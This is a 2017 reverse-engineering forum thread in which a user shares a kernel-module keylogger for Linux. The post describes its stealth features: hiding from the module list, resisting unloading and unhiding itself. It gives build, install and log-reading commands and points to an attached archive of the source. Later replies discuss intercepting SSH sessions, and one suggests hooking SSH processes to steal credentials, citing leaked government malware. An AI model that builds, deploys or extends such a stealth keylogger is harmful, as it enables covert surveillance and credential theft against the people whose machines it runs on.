Exetools  

Go Back   Exetools > General > Source Code

Notices

Reply
 
Thread Tools Display Modes
  #1  
Old 10-15-2017, 06:32
nimaarek nimaarek is offline
Friend
 
Join Date: Sep 2017
Location: Rivendell
Posts: 23
Rept. Given: 0
Rept. Rcvd 1 Time in 1 Post
Thanks Given: 179
Thanks Rcvd at 35 Times in 16 Posts
nimaarek Reputation: 2
kernel-based keylogger for Linux

A simplex kernel-based keylogger written for fun, not evil.

Functionality
The keylogger can do the following:
- Hide from loadable kernel modules list
- Protect against being unloaded by the user
- Unhide itself

Supported Platforms
The keylogger was tested to work on Linux kernels 4.8.0-52 and 4.10 TLS as provided by Ubuntu in Ubuntu 16.04 LTS and Ubuntu 16.10 respectively, but it should be very easy to port to kernels in-between, as well as newer ones.

Setting Up Environment
Install a compiler, Linux headers and all other things required for us to build the keylogger:
Code:
apt-get update
apt-get install build-essential
Build
Code:
make
Use
To install the keylogger module:
Code:
sudo insmod AKeylogger.ko
Test whether the module is loaded:
Code:
lsmod | grep "AKeylogger"
Code:
dmesg
Test whether the logging is happening:
Code:
cat /proc/AKeylog
The log file will show the keystrokes logged after the module has been loaded.

To uninstall the keylogger module:
Code:
sudo rmmod AKeylogger
Attached Files
File Type: rar AKeylogger.rar (2.1 KB, 24 views)
Reply With Quote
The Following 2 Users Say Thank You to nimaarek For This Useful Post:
niculaita (10-15-2017), sh3dow (10-27-2017)
  #2  
Old 10-18-2017, 20:38
winndy winndy is offline
VIP
 
Join Date: Sep 2005
Posts: 229
Rept. Given: 104
Rept. Rcvd 25 Times in 11 Posts
Thanks Given: 19
Thanks Rcvd at 12 Times in 11 Posts
winndy Reputation: 25
Great.
If someone login via ssh or putty, I guess it can't be logged, right?
It only works in local machine?
Reply With Quote
  #3  
Old 10-19-2017, 04:10
nimaarek nimaarek is offline
Friend
 
Join Date: Sep 2017
Location: Rivendell
Posts: 23
Rept. Given: 0
Rept. Rcvd 1 Time in 1 Post
Thanks Given: 179
Thanks Rcvd at 35 Times in 16 Posts
nimaarek Reputation: 2
I do not know, I must test
Reply With Quote
  #4  
Old 10-19-2017, 06:00
sendersu sendersu is offline
VIP
 
Join Date: Oct 2010
Posts: 834
Rept. Given: 324
Rept. Rcvd 216 Times in 110 Posts
Thanks Given: 168
Thanks Rcvd at 347 Times in 195 Posts
sendersu Reputation: 200-299 sendersu Reputation: 200-299 sendersu Reputation: 200-299
According to kernel module it works with keyboard only, eg: register_keyboard_notifier(), etc

the ssh/putty(=telnet) are not using keyboard, they are network (socket) based protocols, so one would need to intercept tcp/udp sockets.... thats totally different type of logger I guess

keep in mind you might have thousands of open sockets in a system (and just 1 keyboard!)
Reply With Quote
The Following User Says Thank You to sendersu For This Useful Post:
nimaarek (10-20-2017)
  #5  
Old 10-20-2017, 16:23
nimaarek nimaarek is offline
Friend
 
Join Date: Sep 2017
Location: Rivendell
Posts: 23
Rept. Given: 0
Rept. Rcvd 1 Time in 1 Post
Thanks Given: 179
Thanks Rcvd at 35 Times in 16 Posts
nimaarek Reputation: 2
For the ssh guesses, the hook up of the system calls and interrupt are response
Reply With Quote
  #6  
Old 10-20-2017, 18:13
Mkz Mkz is offline
Friend
 
Join Date: Jan 2002
Posts: 98
Rept. Given: 0
Rept. Rcvd 2 Times in 2 Posts
Thanks Given: 5
Thanks Rcvd at 25 Times in 17 Posts
Mkz Reputation: 2
My guess is that even if you intercept the ssh data (using the system calls), that wouldn't be enough as it's encrypted and it's decrypted and interpreted (executed, etc.) on user space by the ssh daemon, the shell, etc.

You could still "strace" on a kernel module all kinds of activity that the ssh connection triggers - processes being spawned, received arguments - but not the actual keypresses on the remote terminal window and the sshd receiving each of them, as this last part happens in user space.
Reply With Quote
  #7  
Old 10-27-2017, 21:28
sh3dow sh3dow is offline
Family
 
Join Date: Oct 2014
Posts: 83
Rept. Given: 93
Rept. Rcvd 76 Times in 21 Posts
Thanks Given: 179
Thanks Rcvd at 96 Times in 34 Posts
sh3dow Reputation: 76
Quote:
Originally Posted by sendersu View Post
According to kernel module it works with keyboard only, eg: register_keyboard_notifier(), etc

the ssh/putty(=telnet) are not using keyboard, they are network (socket) based protocols, so one would need to intercept tcp/udp sockets.... thats totally different type of logger I guess

keep in mind you might have thousands of open sockets in a system (and just 1 keyboard!)

why not hook into SSH-related processes and steal credentials or session traffic.
like gyrfalcon malware (according to Vault 7 Wikileaks) https://wikileaks.org/vault7/document/Gyrfalcon-2_0-User_Guide/Gyrfalcon-2_0-User_Guide.pdf
Reply With Quote
The Following User Says Thank You to sh3dow For This Useful Post:
nimaarek (10-28-2017)
  #8  
Old 10-30-2017, 14:51
foosaa foosaa is offline
Friend
 
Join Date: Dec 2005
Posts: 76
Rept. Given: 34
Rept. Rcvd 11 Times in 9 Posts
Thanks Given: 112
Thanks Rcvd at 60 Times in 22 Posts
foosaa Reputation: 11
Could you please post this on any downloadable server? I would like have a look at it. Thanks a lot.
Reply With Quote
Reply

Tags
keylogger, loadable kernel module

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is On


Similar Threads
Thread Thread Starter Forum Replies Last Post
Hades:Windows kernel driver lets reverse engineers monitor user and kernel mode code sh3dow Source Code 0 05-12-2016 03:15
IDA remote debug Linux Kernel Sergey Nameless General Discussion 3 04-03-2012 04:12


All times are GMT +8. The time now is 00:38.


Always Your Best Friend: Aaron, JMI, ahmadmansoor, ZeNiX
( 1998 - 2020 )